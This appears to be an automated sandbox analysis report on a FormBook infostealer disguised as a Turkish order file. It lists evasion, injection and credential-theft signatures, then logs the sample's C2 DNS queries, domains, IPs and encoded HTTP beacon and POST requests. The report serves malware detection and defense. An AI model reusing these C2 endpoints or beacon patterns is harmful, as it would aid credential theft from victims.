Windows Analysis Report
03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe

Overview

General Information

Sample name: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
renamed because original name is a hash value
Original sample name: 03.07.2024-sipari UG01072410 - Onka ve Tic a.s .exe
Analysis ID: 1467071
MD5: 860575aa9868349d8cbdbe70d45098c5
SHA1: 6d4f34011c4a7f06ee54a15b091e0566fc38ac78
SHA256: 88fcbe786b16f3cbb9292ed742d3e284d1936b20e4567cd0318effefd61fc176
Tags: exegeoTUR
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe ReversingLabs: Detection: 34%
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Joe Sandbox ML: detected
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: fc.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fc.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152100316.0000000000A78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rZwD.pdbSHA256 source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: Binary string: rZwD.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2056801260.000000000083E000.00000002.00000001.01000000.0000000C.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4151437192.000000000083E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2138472494.0000000000AEE000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000003.2136603197.0000000000931000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003ABF60 FindFirstFileW,FindNextFileW,FindClose, 9_2_003ABF60
Source: C:\Windows\SysWOW64\fc.exe Code function: 4x nop then xor eax, eax 9_2_00399670
Source: C:\Windows\SysWOW64\fc.exe Code function: 4x nop then pop edi 9_2_003A245D
Source: C:\Windows\SysWOW64\fc.exe Code function: 4x nop then mov ebx, 00000004h 9_2_0302053E

Networking

barindex
Source: DNS query: www.qdfake525pm.xyz
Source: Joe Sandbox View IP Address: 38.150.29.6 38.150.29.6
Source: Joe Sandbox View IP Address: 38.150.29.6 38.150.29.6
Source: Joe Sandbox View IP Address: 162.0.213.72 162.0.213.72
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS4 HTTP/1.1Host: www.qdfake525pm.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS4 HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.katgstamps.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /nm4d/?lxRlvTSh=P+a6bS4ig9vwqW/Z6ilpMEzKmUBtQAyMrIuXDLnJaK725R5zxskqpas4OYRfTGLo7FbtQu2SDY/2/wEY0mHxpB/VyP4fcE5gLsO9P5KmHmpeamOBXX7CtdE=&kh=9PxLvhoHS4 HTTP/1.1Host: www.devele.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4 HTTP/1.1Host: www.valerieomage.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS4 HTTP/1.1Host: www.hissmjkl.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS4 HTTP/1.1Host: www.monchosoft.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS4 HTTP/1.1Host: www.theweekendcreator.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.saalameh.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS4 HTTP/1.1Host: www.ybw73.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS4 HTTP/1.1Host: www.kaps4kancer.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic DNS traffic detected: DNS query: www.qdfake525pm.xyz
Source: global traffic DNS traffic detected: DNS query: www.com-kh.com
Source: global traffic DNS traffic detected: DNS query: www.ddi828media.com
Source: global traffic DNS traffic detected: DNS query: www.miningarea.fun
Source: global traffic DNS traffic detected: DNS query: www.66hc7.com
Source: global traffic DNS traffic detected: DNS query: www.katgstamps.com
Source: global traffic DNS traffic detected: DNS query: www.devele.top
Source: global traffic DNS traffic detected: DNS query: www.valerieomage.com
Source: global traffic DNS traffic detected: DNS query: www.hissmjkl.com
Source: global traffic DNS traffic detected: DNS query: www.monchosoft.com
Source: global traffic DNS traffic detected: DNS query: www.theweekendcreator.com
Source: global traffic DNS traffic detected: DNS query: www.saalameh.com
Source: global traffic DNS traffic detected: DNS query: www.ybw73.top
Source: global traffic DNS traffic detected: DNS query: www.kaps4kancer.org
Source: global traffic DNS traffic detected: DNS query: www.vivemasvivebien.com
Source: unknown HTTP traffic detected: POST /ooz9/ HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.66hc7.comReferer: http://www.66hc7.com/ooz9/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like GeckoData Raw: 6c 78 52 6c 76 54 53 68 3d 42 6e 74 6d 78 66 4a 6a 4a 43 6f 51 61 72 77 6e 41 36 4f 46 62 6a 6d 50 67 66 35 62 43 67 6b 54 41 33 68 75 43 6b 34 38 68 6b 43 50 63 6a 70 42 4c 37 45 53 33 72 6d 70 59 51 32 48 4b 4a 4d 46 2b 73 4a 46 6e 78 74 38 34 41 5a 74 6c 56 73 36 4c 7a 52 31 32 5a 55 57 72 75 62 36 34 69 51 66 42 6c 47 31 4b 56 54 6d 61 69 30 35 62 66 50 7a 68 73 34 57 78 4f 7a 54 66 4a 76 68 38 43 4b 31 56 51 76 39 36 4e 62 35 67 48 64 58 78 4d 74 61 2f 75 78 5a 34 47 59 62 41 33 76 34 43 63 46 30 46 4e 48 50 35 49 51 46 75 73 36 62 78 39 6a 76 63 47 4e 36 69 38 2b 7a 6c 71 44 63 79 6c 59 6e 56 41 3d 3d Data Ascii: lxRlvTSh=BntmxfJjJCoQarwnA6OFbjmPgf5bCgkTA3huCk48hkCPcjpBL7ES3rmpYQ2HKJMF+sJFnxt84AZtlVs6LzR12ZUWrub64iQfBlG1KVTmai05bfPzhs4WxOzTfJvh8CK1VQv96Nb5gHdXxMta/uxZ4GYbA3v4CcF0FNHP5IQFus6bx9jvcGN6i8+zlqDcylYnVA==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 03 Jul 2024 15:46:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 2001Connection: closeData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 45 46 45 46 45 46 3b 0a 09 09 09 09 66 6f 6e 74 3a 20 2e 39 65 6d 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 7b 0a 09 09 09 09 77 69 64 74 68 3a 36 30 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 34 30 70 78 20 61 75 74 6f 20 30 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 35 70 78 20 35 70 78 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 33 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 20 68 31 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 23 46 46 46 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 77 72 61 70 70 65 72 20 61 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 65 6d 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 23 46 46 46 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 36 30 30 70 78 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6e 61 76 74 6f 70 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 34 30 70 78 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 34 42 32 45 42 3b 0a 09 09 09
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:18 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:21 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 